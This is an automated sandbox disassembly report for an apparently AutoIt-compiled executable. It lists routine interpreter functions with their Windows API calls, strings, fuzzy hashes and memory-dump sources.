Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
Instruction ID: 07929bf419f7c151f70569df371b89c7a490e92f5aab3b594f96597a6832e110
Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
Instruction Fuzzy Hash: F24165B3E0E6C555FB71AB609C0037AAA90FB57F44F8E4035D78A035E9CE5DA8948371

Function 00007FF7A51AE774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A6838: CreateFileW.KERNELBASE ref: 00007FF7A51A68A2

Part of subcall function 00007FF7A51C4380: GetCurrentDirectoryW.KERNEL32(?,00007FF7A51AE817), ref: 00007FF7A51C439C

Part of subcall function 00007FF7A51A56D4: GetFullPathNameW.KERNEL32(?,00007FF7A51A56C1,?,00007FF7A51A7A0C,?,?,?,00007FF7A51A109E), ref: 00007FF7A51A56FF

SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A51AE8B0
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A51AE9FA

Part of subcall function 00007FF7A51A9F10: wcscpy.LIBCMT ref: 00007FF7A51A9F61

Strings

Error opening the file, xrefs: 00007FF7A51FA09B, 00007FF7A51FA428
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00007FF7A51FA07A
EA06, xrefs: 00007FF7A51FA0BB
Unterminated string, xrefs: 00007FF7A51FA483
Bad directive syntax error, xrefs: 00007FF7A51FA3FB
>>>AUTOIT SCRIPT<<<, xrefs: 00007FF7A51FA109
AU3!, xrefs: 00007FF7A51AE85F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2207129308-1018226102
Opcode ID: 4ff6fe4801a6e8dcbe3d0805abec616539b723cf49e4c56242313aef72532f37
Instruction ID: 98dd897cf0f2dd8a8a0b3fb568bfb2ffa474ec7d34625333fc9eaaa82603889e
Opcode Fuzzy Hash: 4ff6fe4801a6e8dcbe3d0805abec616539b723cf49e4c56242313aef72532f37
Instruction Fuzzy Hash: F6128462A1A64286EB12FB21E4405BDA760FB86B94FC20132EB4D476BEDF7CD545C710

Function 00007FF7A5232A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32 ref: 00007FF7A5232A8F
inet_addr.WSOCK32 ref: 00007FF7A5232AED
gethostbyname.WSOCK32 ref: 00007FF7A5232AFA
IcmpCreateFile.IPHLPAPI ref: 00007FF7A5232B08
IcmpSendEcho.IPHLPAPI ref: 00007FF7A5232BAD
IcmpCloseHandle.IPHLPAPI ref: 00007FF7A5232C77
WSACleanup.WSOCK32 ref: 00007FF7A5232C7D

Strings

5, xrefs: 00007FF7A5232B79
Ping, xrefs: 00007FF7A5232B3F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
String ID: 5$Ping
API String ID: 1486594354-1972892582
Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
Instruction ID: 7a5cbb880652d1d50d23ef4fc70e591d0c52105a34946736025cc32f3e71ca2b
Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
Instruction Fuzzy Hash: 337150A2B0A64186EB25EB15D88037DA760FB86F90F834431EA5D477F9CF7CD5418760

Function 00007FF7A51DD504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DD681

Strings

NAN(IND), xrefs: 00007FF7A51DD5AF
INF, xrefs: 00007FF7A51DD577
nan(snan), xrefs: 00007FF7A51DD5A4
inf, xrefs: 00007FF7A51DD58A
NAN, xrefs: 00007FF7A51DD565
nan, xrefs: 00007FF7A51DD56C
nan(ind), xrefs: 00007FF7A51DD5BA
NAN(SNAN), xrefs: 00007FF7A51DD599

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
Instruction ID: 5e4bfbd76dba2f3cac5c850a4cbe8775ab2e92176e9b08474ef294880536e833
Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
Instruction Fuzzy Hash: 3541A072A0BB4589FB51DF25E8817E973A4EB0AB98F824535DE5C07BA8DE3CD015C350

Function 00007FF7A52259D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF7A52259FB
GetDiskFreeSpaceW.KERNEL32 ref: 00007FF7A5225A86
GetLastError.KERNEL32 ref: 00007FF7A5225A90
SetErrorMode.KERNEL32 ref: 00007FF7A5225B17

Strings

NOTREADY, xrefs: 00007FF7A5225AB7
INVALID, xrefs: 00007FF7A5225ACD
READONLY, xrefs: 00007FF7A5225AC4
READY, xrefs: 00007FF7A5225AD6
UNKNOWN, xrefs: 00007FF7A5225AB0

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
Instruction ID: ab3ac699785a8fef43a86edf94ed11eb7f044a95b14e840345beacabb4a01e99
Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
Instruction Fuzzy Hash: AE41A776B0AA4285EB11EB25D8801BCB7B1FB55F94F868431DA0D077B9DF38D485C320

Function 00007FF7A52176D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000001,00007FF7A51EC8E3,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7A51A3F7D), ref: 00007FF7A521770E
LoadStringW.USER32 ref: 00007FF7A5217728
wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7A521776B
MessageBoxW.USER32 ref: 00007FF7A52177FF

Strings

., xrefs: 00007FF7A52177DC
%s (%d) : ==> %s.: %s %s, xrefs: 00007FF7A5217755
Error: , xrefs: 00007FF7A52177BE
Line %d:, xrefs: 00007FF7A5217781
Line %d (File "%s"):, xrefs: 00007FF7A5217792

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: HandleLoadMessageModuleStringwprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 4007322891-4153970271
Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
Instruction ID: 564ded7ea98e4bc9f701c75d8335502766999c91076e476d3cac75565c0bbf5a
Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
Instruction Fuzzy Hash: 33317F72B1AA8291EB11EB20E8405BDA360FB95F84FC64032EA4E436BDDF7CE505C750

Function 00007FF7A520E1AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

SendMessageW.USER32 ref: 00007FF7A520E244
GetDlgCtrlID.USER32 ref: 00007FF7A520E256
GetParent.USER32 ref: 00007FF7A520E267
SendMessageW.USER32 ref: 00007FF7A520E27B
GetDlgCtrlID.USER32 ref: 00007FF7A520E287
GetParent.USER32 ref: 00007FF7A520E296
SendMessageW.USER32 ref: 00007FF7A520E2AA

Strings

ComboBox, xrefs: 00007FF7A520E1C6
ListBox, xrefs: 00007FF7A520E1FF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
Instruction ID: de962afc9ed8a23ed7889cdb02fc085c097c1a277b6819e79af8cd35f302033a
Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
Instruction Fuzzy Hash: 8D31C672B0BA8182EB10BB11EC541B9A361FF9AFD0F864131DA9D077EEDE2CD5458760

Function 00007FF7A520E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5210730: GetClassNameW.USER32 ref: 00007FF7A521075B

SendMessageW.USER32 ref: 00007FF7A520E125
GetDlgCtrlID.USER32 ref: 00007FF7A520E137
GetParent.USER32 ref: 00007FF7A520E148
SendMessageW.USER32 ref: 00007FF7A520E15C
GetDlgCtrlID.USER32 ref: 00007FF7A520E168
GetParent.USER32 ref: 00007FF7A520E177
SendMessageW.USER32 ref: 00007FF7A520E18B

Strings

ComboBox, xrefs: 00007FF7A520E0A6
ListBox, xrefs: 00007FF7A520E0DF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
Instruction ID: 828f470516e65ea11e6e9ab377a9ed949f8209b245e4e83a246767f787decbf6
Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
Instruction Fuzzy Hash: 2931A872B0BA4182FA11BB11EC141B9A361FF9AFE0F854231DAAD077EDCE2CD5458760

Function 00007FF7A521CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32 ref: 00007FF7A521CAB8
gethostname.WSOCK32 ref: 00007FF7A521CAD0
gethostbyname.WSOCK32 ref: 00007FF7A521CADB
wcscpy.LIBCMT ref: 00007FF7A521CB12
inet_ntoa.WSOCK32 ref: 00007FF7A521CB38
wcscpy.LIBCMT ref: 00007FF7A521CB61
WSACleanup.WSOCK32 ref: 00007FF7A521CB6E
wcscpy.LIBCMT ref: 00007FF7A521CB80

Strings

0.0.0.0, xrefs: 00007FF7A521CB08

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2479661705-3771769585
Opcode ID: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
Instruction ID: a843bddd8f979fe29008acb15911ad52d306fa1f69edbd1987f291bbe28b3c3d
Opcode Fuzzy Hash: 281b95de85becf4cb0c172ae07bcd082ee5a72526fdd79f54f4593c1c2c2b1be
Instruction Fuzzy Hash: 5E2151A5B0A58291EA20BB11ED443BEA320FF96F80FC24131D54D476FEDE6CE584C720

Function 00007FF7A5250D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

PostMessageW.USER32 ref: 00007FF7A5250DEE
GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7A5250DFF
GetDlgCtrlID.USER32 ref: 00007FF7A5250E0C
GetMenuItemInfoW.USER32 ref: 00007FF7A5250F43
GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7A5250F61
GetMenuItemID.USER32 ref: 00007FF7A5250F76
GetMenuItemInfoW.USER32 ref: 00007FF7A5250FB1
GetMenuItemInfoW.USER32 ref: 00007FF7A5250FFC
CheckMenuRadioItem.USER32 ref: 00007FF7A5251033

Part of subcall function 00007FF7A524FB28: IsWindow.USER32 ref: 00007FF7A524FBED
Part of subcall function 00007FF7A524FB28: IsWindowEnabled.USER32 ref: 00007FF7A524FBFA

DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7A525106A

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
String ID:
API String ID: 2672075419-0
Opcode ID: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
Instruction ID: 92da4fe5845b12e57bdafd4b093f27f0507f02406fb61e1c2814951ff050aa1a
Opcode Fuzzy Hash: 7f60c88404643dc1ac8f4702e655552145117f454e5503c1890abb71af915063
Instruction Fuzzy Hash: 66916EB6B0A6528AE750AF61D8443FDA3A1AB46F88F924035DE4D476EDCE3DE4458320

Function 00007FF7A52192E4 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7A5219318
GetForegroundWindow.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A5219329
GetWindowThreadProcessId.USER32 ref: 00007FF7A5219334
AttachThreadInput.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A5219348
GetWindowThreadProcessId.USER32 ref: 00007FF7A521935E
AttachThreadInput.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A521937A
AttachThreadInput.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A5219393
AttachThreadInput.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A52193D2
AttachThreadInput.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A52193ED
AttachThreadInput.USER32(?,?,?,00007FF7A52180FE), ref: 00007FF7A5219400

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
Instruction ID: 7a87d8f85b5ea0f32a7fcf732c63a00afbb5497d1d55cec3b3a44e191d88d09c
Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
Instruction Fuzzy Hash: F93187F5B0A60286EB65EB25AC44236F2A1BB56F50F964034DC0D437FCDE3EE8458720

Function 00007FF7A520E908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A52103F8: GetWindowThreadProcessId.USER32 ref: 00007FF7A5210414
Part of subcall function 00007FF7A52103F8: GetCurrentThreadId.KERNEL32 ref: 00007FF7A521041C
Part of subcall function 00007FF7A52103F8: AttachThreadInput.USER32(?,?,?,00007FF7A520E921), ref: 00007FF7A5210441

MapVirtualKeyW.USER32 ref: 00007FF7A520E92C
PostMessageW.USER32 ref: 00007FF7A520E947
Sleep.KERNEL32 ref: 00007FF7A520E94F
MapVirtualKeyW.USER32 ref: 00007FF7A520E959
MapVirtualKeyW.USER32 ref: 00007FF7A520E964
PostMessageW.USER32 ref: 00007FF7A520E982
Sleep.KERNEL32 ref: 00007FF7A520E98A
MapVirtualKeyW.USER32 ref: 00007FF7A520E994
PostMessageW.USER32 ref: 00007FF7A520E9B6
Sleep.KERNEL32 ref: 00007FF7A520E9BE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
String ID:
API String ID: 685491774-0
Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
Instruction ID: fce94ac3f1c0c2eab7f47596c2e486eb7b086ca4e921a730fa537bb542fd036a
Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
Instruction Fuzzy Hash: AC11B7B5B0650282F708BB76EC9857D6261AFDDF80FC15034C90E8BBA8DD7ED0548360

Function 00007FF7A520F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON

Download Yara Rule

Strings

NAME, xrefs: 00007FF7A520FAA9, 00007FF7A520FABA
CLASSNN, xrefs: 00007FF7A520F924, 00007FF7A520F935
INSTANCE, xrefs: 00007FF7A520FCC3, 00007FF7A520FCD4
TEXT, xrefs: 00007FF7A520FD2F, 00007FF7A520FD40
REGEXPCLASS, xrefs: 00007FF7A520F988, 00007FF7A520F99D
CLASS, xrefs: 00007FF7A520F8A8, 00007FF7A520F8D1

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 0-1603158881
Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
Instruction ID: 6c820cd7ba44b668c3bca6dd22ef75686fcbd5c2d1e9e567aa9d8ceefbade87e
Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
Instruction Fuzzy Hash: D812B3A2B5B65352EA59EB20CC512F9E290BF56F44FC64131CA1D562F9EF3CE941C320

Function 00007FF7A523767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7A52377E3
VariantInit.OLEAUT32 ref: 00007FF7A5237920
VariantClear.OLEAUT32 ref: 00007FF7A523792A

Strings

Null Object assignment in FOR..IN loop, xrefs: 00007FF7A523799D
_NewEnum, xrefs: 00007FF7A52376AB
get__NewEnum, xrefs: 00007FF7A52376D1
Incorrect Object type in FOR..IN loop, xrefs: 00007FF7A52378FC

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$Init$Clear
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
API String ID: 3467423407-1765764032
Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
Instruction ID: de2d0e0b3996d2b3a84282df89878a06f22e8c890360c5fa7ebcc853d1d297e2
Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
Instruction Fuzzy Hash: 26A18172A05B4186EF14EF65E8805ADA7A0FB85FA8F9A0132DE4D037A8DF3CD545C750

Function 00007FF7A524A350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A932C: CreateWindowExW.USER32 ref: 00007FF7A51A93BC
Part of subcall function 00007FF7A51A932C: GetStockObject.GDI32 ref: 00007FF7A51A93D9
Part of subcall function 00007FF7A51A932C: SendMessageW.USER32 ref: 00007FF7A51A93EC

SendMessageW.USER32 ref: 00007FF7A524A461
SendMessageW.USER32 ref: 00007FF7A524A47A
SetWindowPos.USER32 ref: 00007FF7A524A4A7
wcscat.LIBCMT ref: 00007FF7A524A509
SendMessageW.USER32 ref: 00007FF7A524A51D
SendMessageW.USER32 ref: 00007FF7A524A54E

Strings

-----, xrefs: 00007FF7A524A4FB
SysListView32, xrefs: 00007FF7A524A3B0

Memory Dump Source

